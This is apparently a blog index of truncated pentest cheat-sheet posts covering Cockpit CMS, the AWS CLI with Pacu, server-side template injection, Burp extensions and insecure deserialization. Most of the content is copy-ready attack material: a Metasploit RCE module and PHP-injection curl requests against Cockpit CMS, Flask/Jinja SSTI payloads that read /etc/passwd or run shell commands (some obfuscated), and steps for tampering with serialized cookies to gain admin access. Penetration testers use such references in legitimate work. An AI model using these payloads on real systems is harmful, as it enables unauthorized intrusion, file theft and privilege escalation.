Posts

Cockpit CMS Pentest - Port 9090

  Cockpit is an interactive server admin interface. It is easy to use and very lightweight. Cockpit interacts directly with the operating system from a real Linux session in a browser. Port: 9090 Github # Reset password (CVE-2020-35847) msf> use exploit/multi/cockpit_cms_rce msf> set USER admin msf> run #Find the server info - search for the string curl http://IP_Address:9090/ -o out.txt cat out.txt | grep "var environment" Known Exploits curl -X POST https://example.com/auth/check -H 'User-Agent: Mozilla/5.0' -H 'Content-Type: application/json; charset=UTF-8' -H 'Origin: https://example.com' -d '{"auth":{"user":"test'\'';phpinfo();'\''","password":"b"}}' curl -kL -X POST https://example.com/auth/requestreset -H 'User-Agent: Mozilla/5.0' -H 'Content-Type: application/json; charset=UTF-8' -H 'Origin: https://example.com' -d '{...

Cloud Pentest Cheatsheet- AWS CLI

  Installation and Basic Commands curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "awscliv2.zip" unzip awscliv2.zip sudo ./aws/install #Login - Enter Client ID and Client_Secret aws configure #Login - Create a profile in case you have multiple accounts aws configure --profile Some_NAME #Get info about Access_key aws sts get-caller-identity --profile Some_NAME #Using Short Term Temp Creds aws configure set aws_access_key_id [key-id] --profile ec2 aws configure set aws_secret_access_key [key-id] --profile ec2 aws configure set aws_session_token [token] --profile ec2 aws sts get-caller-identity --profile ec2 Exploitation using PACU #Download and Install PACU pip3 install -U pacu #run pacu and create a session pacu 0 AWS-Pentest #Create AWS login Session - enter Access & Secret Key set_keys #Enum IAM permissions exec iam__enum_permissions #List all permissions for the logged in user whoami #Enum EC2 Instances exec ec2__enum #List all the...

SSTI - Template Injection

  Python - Flask #Checking for Vuln print(render_template_string("{{4*6}}")) #List Items {{config.items()}} #Selecting a class {{5000.__class__.mro()}} #Listing Sub Classes {{5000.__class__.__mro__[1].__subclasses__()}} {{ ''|attr('__class__')|attr('__mro__')|attr('__getitem__')(1)|attr('__subclasses__')() }} #Read Files {{5000.__class__.__mro__[1].__subclasses__()[111].__subclasses__()[0].__subclasses__()[0]('/etc/passwd').read()}} #RCE - Use any 1 from below {{5000.__class__.__mro__[1].__subclasses__()[364]('whoami',shell=True,stdout=-1).communicate()}} {{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}} {{config.__class__.__init__.__globals__['os'].popen('ls').read()}} print(''.__class__.__bases__[0].__subclasses__()[80].__init__.__globals__['__buil'+'tins__']['ev'+'al']('__imp'+'ort__("o...

Useful Burp Suite Extensions & Browser Extensions

  Agarta - Generate Payloads for Injections, RCE etc. JSON Web Tokens - Easily recode the token and modify the request. Burp Bounty - Authorize - check Broken Access Control AuthMatrix - Auth Priv Esc Checks Broken Link Hijacking - Active Scan ++ J2EEScan Hackvertor - used for encodings of various types Param Miner - GadgetProbe - https://github.com/BishopFox/GadgetProbe Comes with wordlist Java Deserialization Scanner IIS Tilde Enumeration Scanner - Finds IIS 8.3 Shortname Vuln Browser Extensions Wappalyzer EditThisCookie DotGit Shodan

Insecure Deserialization Cheatsheet

 Any class that implements the interface java.io.Serializable can be serialized and deserialized. If you have source code access, take note of any code that uses the readObject() method, which is used to read and deserialize data from an InputStream. The native methods for PHP serialization are serialize() and unserialize(). If you have source code access, you should start by looking for unserialize(). Basic Serialization - look for cookies with base64 encoded or some kind of serialized value; you can update admin;b:0 to admin;b:1 --> which makes us admin PHP - Exploiting Data Types - Look for cookies and any other serialized values - Update the user value or the username to any user - if required update the access token, serialize it and try to access unauthorized data Example Update the data from O:4:"User":2:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"msai659yp7cfu0magd7vm3siq9ls2cld";} to O:4:"User":2:{s:...